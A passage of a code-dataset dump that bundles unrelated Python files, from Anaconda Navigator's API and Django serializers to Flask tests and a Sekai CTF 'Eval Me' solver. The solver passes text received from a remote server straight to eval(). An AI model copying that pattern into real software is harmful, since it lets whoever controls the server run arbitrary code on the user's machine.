-T TxID.\n :return:\n '''\n\n # compose identity\n chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(chainid)\n\n # inputs for cli add key replacement\n # fetch the height and keys of the chain id\n self.heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(self.heights)['DirectoryBlockHeight']\n keys = self.cli_identity.get_keys_at_height(chainid,directory_block_height)\n signerkey = self.cli_chain.parse_keys_data(keys,0)\n oldkey = self.cli_chain.parse_keys_data(keys,2)\n\n self.entry_credit_address100 = fund_entry_credit_address(100)\n newkey = self.cli_identity.new_identity_key()\n\n # identity add key replacement\n entry_text = self.cli_identity.add_key_replacement(chainid,oldkey,newkey,signerkey,self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n wait_for_entry_in_block(entry_hash,chainid)\n\n # fetch the height and keys of the chain id\n heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(heights)['DirectoryBlockHeight']\n new_key_list = self.cli_identity.get_keys_at_height(chainid, directory_block_height)\n\n # fetch the key list and add it to the parsed key list\n parsed_key_list = []\n for i in range(0,3):\n parsed_key_list.append(self.cli_chain.parse_keys_data(new_key_list,i))\n\n #look for that new key in the new key list\n found = False\n for i in range(0,len(parsed_key_list)):\n if (str(parsed_key_list[i]) == str(newkey)):\n found = True\n break\n\n self.assertTrue(found, \"Testcase Failed\")\n","repo_name":"FactomProject/tests_python","sub_path":"cli_tests/cli_tests_identity_wallet.py","file_name":"cli_tests_identity_wallet.py","file_ext":"py","file_size_in_byte":9003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42816351158","text":"from collections import OrderedDict\nimport json\nimport os\nimport tempfile\n\n# Third party imports\nfrom qtpy.QtCore import QObject, Signal\n\n# Local imports\nfrom anaconda_navigator.api.client_api import ClientAPI\nfrom anaconda_navigator.api.conda_api import CondaAPI\nfrom anaconda_navigator.api.download_api import DownloadAPI\nfrom anaconda_navigator.config import CONF\nfrom anaconda_navigator.static import images\n\n\nclass _AnacondaAPI(QObject):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n\n sig_repodata_updated = Signal(object)\n sig_repodata_errored = Signal()\n\n def __init__(self):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n super(_AnacondaAPI, self).__init__()\n\n # API's\n self.config = CONF\n self._conda_api = CondaAPI()\n self._client_api = ClientAPI()\n self._download_api = DownloadAPI()\n self.ROOT_PREFIX = self._conda_api.ROOT_PREFIX\n\n # Vars\n self._checking_repos = None\n self._data_directory = None\n self._files_downloaded = None\n self._repodata_files = None\n self._valid_repos = None\n\n # Expose some methods for convenient access. 
Methods return a worker\n self.conda_create = self._conda_api.create\n self.conda_create_yaml = self._conda_api.create_from_yaml\n self.conda_clone = self._conda_api.clone_environment\n self.conda_dependencies = self._conda_api.dependencies\n self.conda_get_condarc_channels = self._conda_api.get_condarc_channels\n self.conda_install = self._conda_api.install\n self.conda_remove = self._conda_api.remove\n self.conda_terminate = self._conda_api.terminate_all_processes\n self.conda_config_add = self._conda_api.config_add\n self.conda_config_remove = self._conda_api.config_remove\n self.pip_list = self._conda_api.pip_list\n self.pip_remove = self._conda_api.pip_remove\n\n # No workers are returned for these methods\n self.conda_clear_lock = self._conda_api.clear_lock\n self.conda_environment_exists = self._conda_api.environment_exists\n self.conda_get_envs = self._conda_api.get_envs\n self.conda_linked = self._conda_api.linked\n self.conda_linked_apps_info = self._conda_api.linked_apps_info\n self.conda_get_prefix_envname = self._conda_api.get_prefix_envname\n self.conda_package_version = self._conda_api.package_version\n self.conda_platform = self._conda_api.get_platform\n self.conda_load_proxy_config = self._conda_api.load_proxy_config\n\n # These download methods return a worker\n get_api_info = self._download_api.get_api_info\n is_valid_url = self._download_api.is_valid_api_url\n self.download = self._download_api.download\n self.download_is_valid_url = self._download_api.is_valid_url\n self.download_is_valid_api_url = is_valid_url\n self.download_get_api_info = lambda: get_api_info(\n self._client_api.get_api_url())\n self.download_is_valid_channel = self._download_api.is_valid_channel\n self.download_terminate = self._download_api.terminate\n\n # These client methods return a worker\n self.client_store_token = self._client_api.store_token\n self.client_remove_token = self._client_api.remove_token\n self.client_login = self._client_api.login\n self.client_logout = self._client_api.logout\n self.client_load_repodata = self._client_api.load_repodata\n self.client_prepare_packages_data = self._client_api.prepare_model_data\n self.client_user = self._client_api.user\n self.client_domain = self._client_api.domain\n self.client_set_domain = self._client_api.set_domain\n self.client_packages = self._client_api.packages\n self.client_multi_packages = self._client_api.multi_packages\n self.client_organizations = self._client_api.organizations\n self.client_load_token = self._client_api.load_token\n self.client_get_api_url = self._client_api.get_api_url\n self.client_set_api_url = self._client_api.set_api_url\n\n # No workers are returned for these methods\n m = self._client_api.get_logged_user_list_channels\n self.client_get_logged_user_list_channels = m\n\n # --- Helper methods\n # -------------------------------------------------------------------------\n def _set_repo_urls_from_channels(self, channels):\n \"\"\"\n Convert a channel into a normalized repo name including.\n\n Channels are assumed in normalized url form.\n \"\"\"\n repos = []\n sys_platform = self._conda_api.get_platform()\n\n for channel in channels:\n url = '{0}/{1}/repodata.json.bz2'.format(channel, sys_platform)\n repos.append(url)\n\n return repos\n\n def _check_repos(self, repos):\n \"\"\"Check if repodata urls are valid.\"\"\"\n self._checking_repos = []\n self._valid_repos = []\n\n for repo in repos:\n worker = self.download_is_valid_url(repo)\n worker.sig_finished.connect(self._repos_checked)\n worker.repo = repo\n 
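# (added note) the URL check is asynchronous: each worker's sig_finished\n            # signal fires _repos_checked, which removes the repo from\n            # _checking_repos and, once that list is empty, downloads repodata\n            # for the repos that proved valid.\n            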
self._checking_repos.append(repo)\n\n def _repos_checked(self, worker, output, error):\n \"\"\"Callback for _check_repos.\"\"\"\n if worker.repo in self._checking_repos:\n self._checking_repos.remove(worker.repo)\n\n if output:\n self._valid_repos.append(worker.repo)\n\n if len(self._checking_repos) == 0:\n self._download_repodata(self._valid_repos)\n\n def _repo_url_to_path(self, repo):\n \"\"\"Convert a `repo` url to a file path for local storage.\"\"\"\n repo = repo.replace('http://', '')\n repo = repo.replace('https://', '')\n repo = repo.replace('/', '_')\n\n return os.sep.join([self._data_directory, repo])\n\n def _download_repodata(self, checked_repos):\n \"\"\"Dowload repodata.\"\"\"\n self._files_downloaded = []\n self._repodata_files = []\n self.__counter = -1\n\n if checked_repos:\n for repo in checked_repos:\n path = self._repo_url_to_path(repo)\n self._files_downloaded.append(path)\n self._repodata_files.append(path)\n worker = self.download(repo, path)\n worker.url = repo\n worker.path = path\n worker.sig_finished.connect(self._repodata_downloaded)\n else:\n # Empty, maybe there is no internet connection\n # Load information from conda-meta and save that file\n path = self._get_repodata_from_meta()\n self._repodata_files = [path]\n self._repodata_downloaded()\n\n def _get_repodata_from_meta(self):\n \"\"\"Generate repodata from local meta files.\"\"\"\n path = os.sep.join([self.ROOT_PREFIX, 'conda-meta'])\n packages = os.listdir(path)\n meta_repodata = {}\n for pkg in packages:\n if pkg.endswith('.json'):\n filepath = os.sep.join([path, pkg])\n with open(filepath, 'r') as f:\n data = json.load(f)\n\n if 'files' in data:\n data.pop('files')\n if 'icondata' in data:\n data.pop('icondata')\n\n name = pkg.replace('.json', '')\n meta_repodata[name] = data\n\n meta_repodata_path = os.sep.join([self._data_directory,\n 'offline.json'])\n repodata = {'info': [],\n 'packages': meta_repodata}\n\n with open(meta_repodata_path, 'w') as f:\n json.dump(repodata, f, sort_keys=True,\n indent=4, separators=(',', ': '))\n\n return meta_repodata_path\n\n def _repodata_downloaded(self, worker=None, output=None, error=None):\n \"\"\"Callback for _download_repodata.\"\"\"\n if worker:\n self._files_downloaded.remove(worker.path)\n\n if worker.path in self._files_downloaded:\n self._files_downloaded.remove(worker.path)\n\n if len(self._files_downloaded) == 0:\n self.sig_repodata_updated.emit(list(set(self._repodata_files)))\n\n # --- Public API\n # -------------------------------------------------------------------------\n def set_data_directory(self, data_directory):\n \"\"\"Set the directory where repodata and metadata are stored.\"\"\"\n self._data_directory = data_directory\n\n def repodata_files(self, channels=None):\n \"\"\"\n Return the repodata paths based on `channels` and the `data_directory`.\n\n There is no check for validity here.\n \"\"\"\n if channels is None:\n channels = self.conda_get_condarc_channels()\n\n repodata_urls = self._set_repo_urls_from_channels(channels)\n\n repopaths = []\n\n for repourl in repodata_urls:\n fullpath = os.sep.join([self._repo_url_to_path(repourl)])\n repopaths.append(fullpath)\n\n return repopaths\n\n def update_repodata(self, channels=None):\n \"\"\"Update repodata from channels or use condarc channels if None.\"\"\"\n norm_channels = self.conda_get_condarc_channels(channels=channels,\n normalize=True)\n repodata_urls = self._set_repo_urls_from_channels(norm_channels)\n self._check_repos(repodata_urls)\n\n def update_metadata(self):\n \"\"\"\n Update 
the metadata available for packages in repo.continuum.io.\n\n Returns a download worker.\n \"\"\"\n # TODO: there needs to be an uniform way to query the metadata for\n # both repo and anaconda.org\n if self._data_directory is None:\n raise Exception('Need to call `api.set_data_directory` first.')\n\n metadata_url = 'https://repo.continuum.io/pkgs/metadata.json'\n filepath = os.sep.join([self._data_directory, 'metadata.json'])\n worker = self.download(metadata_url, filepath)\n return worker\n\n def check_valid_channel(self,\n channel,\n conda_url='https://conda.anaconda.org'):\n \"\"\"Check if channel is valid.\"\"\"\n if channel.startswith('https://') or channel.startswith('http://'):\n url = channel\n else:\n url = \"{0}/{1}\".format(conda_url, channel)\n\n if url[-1] == '/':\n url = url[:-1]\n plat = self.conda_platform()\n repodata_url = \"{0}/{1}/{2}\".format(url, plat, 'repodata.json')\n worker = self.download_is_valid_url(repodata_url)\n worker.url = url\n return worker\n\n def process_apps(self, apps, prefix=None):\n \"\"\"Process app information.\"\"\"\n # TODO: This also needs to check installed apps in the prefix\n applications = {}\n if prefix is None:\n prefix = self.ROOT_PREFIX\n\n # Temporal hardcoded images\n image_paths = {\n 'glueviz': images.GLUEVIZ_ICON_1024_PATH,\n 'spyder-app': images.SPYDER_ICON_1024_PATH,\n 'spyder': images.SPYDER_ICON_1024_PATH,\n 'ipython-qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'ipython-notebook': images.IPYTHON_NOTEBOOK_ICON_1024_PATH,\n 'notebook': images.NOTEBOOK_ICON_1024_PATH,\n 'orange-app': images.ORANGE_ICON_1024_PATH,\n 'rodeo': images.RODEO_ICON_1024_PATH,\n 'veusz': images.VEUSZ_ICON_1024_PATH}\n\n APPS_DESCRIPTIONS = {\n 'glueviz': 'Multidimensional data visualization across files. '\n 'Explore relationships within and among related '\n 'datasets.',\n 'notebook': 'Web-based, interactive computing notebook '\n 'environment. Edit and run human-readable docs while '\n 'describing the data analysis.',\n 'orange-app': 'Component based data mining framework. Data '\n 'visualization and data analysis for novice and '\n 'expert. Interactive workflows with a large '\n 'toolbox.',\n 'qtconsole': 'PyQt GUI that supports inline figures, proper '\n 'multiline editing with syntax highlighting, '\n 'graphical calltips, and more.',\n 'spyder': 'Scientific PYthon Development EnviRonment. Powerful '\n 'Python IDE with advanced editing, interactive '\n 'testing, debugging and introspection features',\n 'rodeo': 'A browser-based IDE for data science with python. '\n 'Includes autocomplete, syntax highlighting, IPython '\n 'support.',\n 'dataportal': 'Interactive exploration of larger-than-memory '\n 'datasets. Create data sources, perform '\n 'transformations and combinations, and visualise.',\n 'veusz': 'Veusz is a GUI scientific plotting and graphing '\n 'package. 
It is designed to produce publication-ready '\n 'Postscript or PDF output.'\n }\n APPS_DESCRIPTIONS['anaconda-mosaic'] = APPS_DESCRIPTIONS['dataportal']\n\n invalid_apps = ['spyder-app', 'ipython-qtconsole', 'ipython-notebook']\n\n for app_name in apps:\n if app_name in invalid_apps:\n continue\n\n data = apps[app_name]\n versions = data.get('versions')\n description = APPS_DESCRIPTIONS.get(app_name,\n data.get('description', ''))\n version = versions[-1] # Versions are sorted from small to big\n image_path = image_paths.get(app_name,\n images.ANACONDA_ICON_512_PATH)\n app_entry = data.get('app_entry').get(version, '')\n\n # Handle deprecated entrypoints for notebook and qtconsole\n if 'ipython notebook' in app_entry.lower():\n app_entry = app_entry.replace('ipython notebook',\n 'jupyter-notebook')\n elif 'ipython qtconsole' in app_entry.lower():\n app_entry = app_entry.replace('ipython qtconsole',\n 'jupyter-qtconsole')\n\n application = dict(name=app_name,\n description=description,\n versions=versions,\n command=app_entry,\n image_path=image_path)\n applications[app_name] = application\n\n return applications\n\n # --- New moved API\n # -------------------------------------------------------------------------\n @property\n def channels(self):\n \"\"\"Convenience property for returning conda rc channels.\"\"\"\n return list(self.conda_get_condarc_channels())\n\n @property\n def active_channels(self):\n \"\"\"Convenience property for returning active channels.\"\"\"\n active_channels = self.config.get('main', 'conda_active_channels')\n if active_channels is None or not active_channels:\n active_channels = self.channels\n return active_channels\n\n @property\n def active_normalized_channels(self):\n \"\"\"Convenience property for returning active normalized channels.\"\"\"\n return self.conda_get_condarc_channels(\n channels=self.active_channels,\n normalize=True)\n\n @property\n def user_dynamic_channels(self):\n \"\"\"\n Return normalized list of logged user channels.\n\n These are the channels that are located at anaconda server (cloud),\n as opposed to the repo.continuum ones.\n\n FIXME: This method is flawed as defaults could also include logged\n channels.\n \"\"\"\n channels = []\n condarc_channels = self._conda_api.get_condarc_channels()\n\n for ch in condarc_channels:\n if ('repo.continuum' not in ch and ch != 'defaults' and\n '/t/' not in ch):\n channels.append(ch)\n\n channels = [ch for ch in channels if ch in self.active_channels]\n return channels\n\n @property\n def environments(self):\n \"\"\"\n Return an ordered dictionary of all existing named environments.\n\n The dictionary includes the root environment as the first entry.\n \"\"\"\n environments = OrderedDict()\n environments_prefix = sorted(self.conda_get_envs(log=False))\n environments['root'] = self.ROOT_PREFIX\n\n for prefix in environments_prefix:\n name = os.path.basename(prefix)\n environments[name] = prefix\n\n return environments\n\n\nANACONDA_API = None\n\n\ndef AnacondaAPI():\n \"\"\"Manager API threaded worker.\"\"\"\n global ANACONDA_API\n\n if ANACONDA_API is None:\n ANACONDA_API = _AnacondaAPI()\n\n return ANACONDA_API\n\n\n# --- Local testing\n# -----------------------------------------------------------------------------\ndef finished(worker, output, error): # pragma: no cover\n \"\"\"Print information on test finished.\"\"\"\n print(worker, output, error)\n\n\ndef download_finished(url, path): # pragma: no cover\n \"\"\"Print information on downlaod finished.\"\"\"\n print(url, path)\n\n\ndef 
repodata_updated(repos): # pragma: no cover\n \"\"\"Print information on repodata updated.\"\"\"\n print(repos)\n\n\ndef test(): # pragma: no cover\n \"\"\"Main local test.\"\"\"\n from anaconda_navigator.utils.qthelpers import qapplication\n\n app = qapplication()\n api = AnacondaAPI()\n api.sig_repodata_updated.connect(repodata_updated)\n data_directory = tempfile.mkdtemp()\n api.set_data_directory(data_directory)\n worker = api.update_metadata()\n worker.sig_download_finished.connect(download_finished)\n api.update_repodata()\n app.exec_()\n\n\nif __name__ == '__main__': # pragma: no cover\n test()\n","repo_name":"tsukudamayo/python","sub_path":"src/py35/site-packages/anaconda_navigator/api/anaconda_api.py","file_name":"anaconda_api.py","file_ext":"py","file_size_in_byte":18039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29045646579","text":"import pandas as pd\n\n\ndef get_municipi(data):\n return data.split(\"(\")[0].strip()\n\n\ndef get_codi_postal(data):\n if len(data.split(\"(\")) > 1:\n cod_p = data.split(\"(\")[1]\n result = cod_p[:-1]\n else:\n result = None\n return result\n\n\ndef remove_nan(data):\n if not isinstance(data, str):\n return \"\"\n else:\n return data\n\ndef remove_nan_list(data):\n if not isinstance(data, list):\n return []\n else:\n return data\n\n\ndef get_department(data):\n return data.split(\"\\\\\")[0]\n\n\n# Main gather function\ndef read_data_from_xlsx(file):\n columns = {'Num ens': 'Num ens', 'Província': 'Província', 'Municipi': 'Municipi', 'Via': 'Via',\n 'Núm. via': 'Núm. via', 'Nom': 'Nom','Tipus ús': 'Tipus ús',\n 'Nif resp. fiscal efectiu': 'Nif resp. fiscal efectiu',\n 'Responsable fiscal efectiu': 'Responsable fiscal efectiu',\n 'Sup. const. sobre rasant': 'Sup. const. sobre rasant',\n 'Sup. const. sota rasant': 'Sup. const. sota rasant',\n 'Sup. construïda total': 'Sup. construïda total', 'Sup. del terreny': 'Sup. del terreny',\n 'Component X': 'Component X', 'Component Y': 'Component Y', 'Ref. Cadastral': 'Ref. Cadastral',\n 'Classificació del sòl': 'Classificació del sòl'}\n df = pd.read_excel(file, dtype=str)\n df.rename(columns=columns, inplace=True)\n df.set_index(\"Num ens\", inplace=True)\n\n df['Tipus ús'] = df['Tipus ús'].apply(remove_nan).apply(lambda x: str(x.split(\",\")) if len(x.split(\",\")) > 1 else str([x]))\n\n # df[\"Codi_postal\"] = df[\"Municipi\"].apply(get_codi_postal)\n #df[\"Municipi\"] = df[\"Municipi\"].apply(get_municipi)\n df[\"Responsable fiscal efectiu\"] = df[\"Responsable fiscal efectiu\"].apply(remove_nan).apply(get_department)\n if \"Classificació del sòl\" in df.columns:\n df[\"Classificació del sòl\"] = df[\"Classificació del sòl\"].apply(remove_nan)\n df[\"Ref. Cadastral\"] = df[\"Ref. 
Cadastral\"].apply(remove_nan)\n df.reset_index(inplace=True)\n return df.to_dict(\"records\")\n","repo_name":"biggproject/Harmonizer","sub_path":"Harmonizer_Cimne/sources/GPG/gather/GPG_gather.py","file_name":"GPG_gather.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ca","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13210202922","text":"from unittest import TestCase\nimport game_template.model.rpg_world as model\nimport logging\n\nclass TestLevelBuilder(TestCase):\n def test_initialise(self):\n\n logging.basicConfig(level=logging.INFO)\n\n levels = model.LevelBuilder()\n levels.initialise()\n\n self.fail()\n\n def test_load_levels(self):\n\n logging.basicConfig(level=logging.INFO)\n\n floors = model.FloorBuilder()\n floors.initialise()\n\n levels = model.LevelBuilder()\n levels.initialise(floors)\n\n for level in levels.levels.values():\n print(str(level)+\"\\n\")\n\n self.fail()\n\n def test_build_levels(self):\n self.fail()\n","repo_name":"kwoolter/Tower2","sub_path":"game_template/model/test_levelBuilder.py","file_name":"test_levelBuilder.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36477462999","text":"import brownie\nimport json\n\nfrom brownie import MyToken\n\n# Set the addresses for the Pantos forwarder, hub, and PAN token\n# can be found here: https://pantos.gitbook.io/technical-documentation/general/deploying-token#overview-of-pantos-blockchain-ids-and-contract-addresses\nHUB_ADDRESS = \"\"\n\n# this is the token address you want to unregister\nTOKEN_ADDRESS = \"\"\n\n# Define the deployToken function\ndef unregister_token(account_name: str):\n # loading Pantos Hub abi data\n with open('./abi/pantos_hub_abi.json', 'r') as f:\n pantos_hub_abi_data = json.loads(f.read())\n\n # Load the PantosHub contract from the ABI\n hub = brownie.Contract.from_abi(\"PantosHub\", HUB_ADDRESS,\n pantos_hub_abi_data['abi'])\n\n account = brownie.accounts.load(account_name)\n\n # unregister the custom token on the PantosHub\n hub.unregisterToken(TOKEN_ADDRESS,\n {'from': account})\n","repo_name":"kurzi2704/pantos-pandas-creator","sub_path":"scripts/unregister_token.py","file_name":"unregister_token.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"27111980428","text":"from sympy import *\r\nimport socket\r\nimport time\r\n\r\n# Creates and connects to the socket that is hosting the challenge\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((\"34.148.151.228\", 9000))\r\n# Receive the data from the socket and then convert it to a string\r\ndata = s.recv(1024)\r\nstringSocket = data.decode('utf-8') \r\n# Print out the data received from the socket so you can see what is happening\r\nprint(stringSocket)\r\n# Skip to position 331 in the string since that was the fixed length at the beginning without an equation\r\nstringIndex = 162\r\n\r\n# Set an arbitrary high number to loop through\r\nfor i in range(100):\r\n # Initate a boolean for the while loop and a string to store the equation before the equal sign\r\n randomVal = true\r\n stringEquation = ''\r\n while randomVal:\r\n # Takes the character at the stringIndex and sees if it is an equals sign or a new line, if it isn't adds it to the string\r\n tempChar = stringSocket[stringIndex]\r\n stringIndex = stringIndex + 1\r\n if tempChar == '=':\r\n randomVal = 
False\r\n        elif tempChar == '\\n':\r\n            randomVal = False\r\n        else: \r\n            stringEquation = stringEquation + tempChar\r\n    \r\n    # Evaluate the expression string; despite the sympy import, plain eval()\r\n    # does the work here, since the server only sends simple arithmetic\r\n    print(\"hi\" + stringEquation)\r\n    eq1 = eval(stringEquation)\r\n    print(eq1)\r\n    # Convert the int to the string for easier printing and encoding\r\n    numString = str(eq1) + \"\\n\"\r\n    # Sends the correct answer encoded back to the server\r\n    s.send(str.encode(numString))\r\n    # Prints the value sent to the server so you can see what is happening\r\n    print(numString)\r\n    # Grab the new data and convert it into a string\r\n    newData = s.recv(1024)\r\n    stringSocket = newData.decode('utf-8') \r\n    # Print the string so you know what is going on\r\n    print(stringSocket)\r\n    # Sets the stringIndex back to one as the new data is only the new equation\r\n    stringIndex = 8\r\n","repo_name":"Matilda12390/Sekai-CTF-Writeups","sub_path":"Eval Me/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31232584301","text":"from .models import Category, Product, Banner\nfrom rest_framework import serializers\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Category\n        fields = ['id', 'title', 'parent_category_id', 'created_at', 'updated_at']\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n    image = serializers.FileField(max_length=100, use_url=True)\n    class Meta:\n        model = Product\n        fields = ['id','seller','user', 'title','name','category','image','price','discount','quantity','stock','available','description','created_at', 'updated_at']\n    def create(self, validated_data):\n        # image is a single uploaded file; the original iterated over it, which\n        # loops over the file's lines and creates one Product per line\n        image = validated_data.pop('image')\n        return Product.objects.create(image=image, **validated_data)\n    \n\nclass BannerSerializer(serializers.ModelSerializer):\n    image1 = serializers.ImageField(max_length=100, use_url=True)\n    image2 = serializers.ImageField(max_length=100, use_url=True)\n    image3 = serializers.ImageField(max_length=100, use_url=True)\n    class Meta:\n        model=Banner\n        fields=[\"image1\",\"image2\",\"image3\"]\n\n\n# from django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\nfrom drf_extra_fields.fields import Base64ImageField\n\n\nclass ProductDetailSerializer(serializers.ModelSerializer):\n    seller = serializers.SlugRelatedField(slug_field=\"username\", queryset=User.objects)\n    category = serializers.SerializerMethodField()\n    image = Base64ImageField()\n\n    def get_category(self, obj):\n        return obj.category.name\n\n    class Meta:\n        model = Product\n        exclude = (\"modified\",)  # DRF requires exclude to be a list or tuple, not a bare string\n","repo_name":"Naresh8722/Naresh8722","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37567184687","text":"import collections\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\ndef inp():\n    return (int(input()))\ndef inlt():\n    return (list(map(int, input().split())))\ndef insr():\n    s = input()\n    return (list(s[:len(s) - 1]))\ndef invr():\n    return (map(int, input().split()))\n\n\n
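# (added note) competitive-programming fast-I/O idiom: rebinding input to\n# sys.stdin.readline makes repeated reads cheaper; inp/inlt/insr/invr wrap it\n# to read one int, an int list, a character list, and an int iterator.\n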
def solution():\n    n = inp()\n    strength = inlt()\n    weaker = 1\n    Monte = strength[0]\n    for i in range(1, n):\n        if strength[i] < Monte:\n            weaker += 1\n    res = 1\n    while n & weaker == 0:\n        n = n >> 1\n        res = res << 1\n    print(res)\n    return\n\n\nif __name__ == '__main__':\n    t = 1\n    for i in range(t):\n        solution()\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/UCRPC_F23/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41759528169","text":"#!/usr/bin/env python3\ndef balance(initial=100, *operations, cashback):\n    '''Calculates the balance.\n\n    Computes the current balance from the operation amounts and the cashback.'''\n    balance = initial\n    for operation in operations:\n        balance -= operation\n        balance += cashback\n    print(balance)\n\nbalance(1000, 300, 2, 34, 29, 100, cashback=300)\n# read the docstring of the balance function via its __doc__ attribute\nprint(balance.__doc__)\n# the help function reads the __doc__ attribute of the given function\n# and pretty-prints it to the screen\nhelp(balance)","repo_name":"nicklada/pythonCourse","sub_path":"Functions/10.10.doc.py","file_name":"10.10.doc.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18712517391","text":"import unittest\nfrom app import create_app, db\nfrom app.models import *\nfrom config import Config\nimport HtmlTestRunner\n\nclass TestConfig(Config):\n    TESTING = True\n    SQLALCHEMY_DATABASE_URI = 'sqlite://'\n\n\nclass UserModelCase(unittest.TestCase):\n    def setUp(self):\n        self.app = create_app(TestConfig)\n        self.app_context = self.app.app_context()\n        self.app_context.push()\n        db.create_all()\n\n    def tearDown(self):\n        db.session.remove()\n        db.drop_all()\n        self.app_context.pop()\n\n    def test_password_hashing(self):\n        u = User(username='susan')\n        u.set_password('cat')\n        self.assertFalse(u.check_password('dog'))\n        self.assertTrue(u.check_password('cat'))\n\n    def test_user_row(self):\n        u = User(username = \"hello\", email = \"whatever@gmail.com\")\n        u.set_password('hello')\n        db.session.add(u)\n        db.session.commit()\n        tmp = u.id\n        p = User.query.filter_by(id = tmp).first()\n        self.assertEqual(p.username, \"hello\")\n        self.assertEqual(p.email, \"whatever@gmail.com\")\n        self.assertTrue(p.check_password('hello'))\n        self.assertFalse(p.check_password('hell'))\n\nclass FacultyCase(unittest.TestCase):\n    def setUp(self):\n        self.app = create_app(TestConfig)\n        self.app_context = self.app.app_context()\n        self.app_context.push()\n        db.create_all()\n\n    def tearDown(self):\n        db.session.remove()\n        db.drop_all()\n        self.app_context.pop()\n\n    def test_add_faculty_details(self):\n        f = FacultyDetails(fac_id = \"CSE333\", name = \"venkat\", designation = \"Prof\", department = \"CSE\")\n        db.session.add(f)\n        db.session.commit()\n        p = FacultyDetails.query.filter_by(id = f.id).first()\n        self.assertEqual(p.name, \"venkat\")\n        self.assertEqual(p.designation, \"Prof\")\n\n    def test_add_faculty(self):\n        f = FacultyDetails(fac_id = \"CSE333\", name = \"venkat\", designation = \"Prof\", department = \"CSE\")\n        db.session.add(f)\n        db.session.commit()\n\n        g = Faculty(fac_id = \"CSE333\", user_id = f.fac_id, elective_id = \"None\")\n        db.session.add(g)\n        db.session.commit()\n\n        querystring = \"Select * from faculty, faculty_details where faculty.fac_id = faculty_details.fac_id\"\n        res = db.engine.execute(querystring)\n\n        for row in res:\n            self.assertEqual(row[7], 
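# (added note) row spans the joined faculty + faculty_details columns; row[6] is name, row[7] designation\n            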
\"Prof\")\n self.assertEqual(row[6], \"venkat\")\n \n\nclass StudentCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_add_student_details(self):\n s = StudentDetails(roll_no = \"CSE17001\", name = \"Shreya\", batch=\"2020\",section=\"A\", department = \"CSE\")\n db.session.add(s)\n db.session.commit()\n p = StudentDetails.query.filter_by(id = s.id).first()\n self.assertEqual(p.name, \"Shreya\")\n self.assertEqual(p.roll_no, \"CSE17001\")\n\n def test_add_student(self):\n s = StudentDetails(roll_no = \"CSE17001\", name = \"Shreya\", batch=\"2020\",section=\"A\", department = \"CSE\")\n db.session.add(s)\n db.session.commit()\n\n g = Student(roll_number = \"CSE17001\", user_id = s.roll_no,name=\"Shreya\", elective_id1 = \"None\", elective_id2 = \"None\", elective_id3 = \"None\",allotted_elective=\"None\",random_elective=\"None\")\n db.session.add(g)\n db.session.commit()\n\n querystring = \"Select * from student, student_details where student.roll_number = student_details.roll_no\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[3], \"CSE17001\")\n self.assertEqual(row[11], \"Shreya\")\n\nclass InitialElectiveListCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_initial_elective_list(self):\n i = InitialElectiveList(electiveID = \"CSE387\",electiveName=\"OpenLab\",electiveDescription=\"OpenLab Description\")\n db.session.add(i)\n db.session.commit()\n p = InitialElectiveList.query.filter_by(id = i.id).first()\n self.assertEqual(p.electiveID, \"CSE387\")\n self.assertEqual(p.electiveName, \"OpenLab\")\n\n def test_initial_elective_list_check(self):\n f = FacultyDetails(fac_id = \"CSE333\", name = \"venkat\", designation = \"Prof\", department = \"CSE\")\n db.session.add(f)\n db.session.commit()\n\n i = InitialElectiveList(electiveID = \"CSE387\",electiveName=\"OpenLab\",electiveDescription=\"OpenLab Description\")\n db.session.add(i)\n db.session.commit()\n\n querystring = \"Select * from faculty, initial_elective_list where faculty.elective_id = initial_elective_list.electiveID\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[3], \"CSE387\")\n self.assertEqual(row[6], \"OpenLab\")\n\nclass ElectiveListv2Case(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n 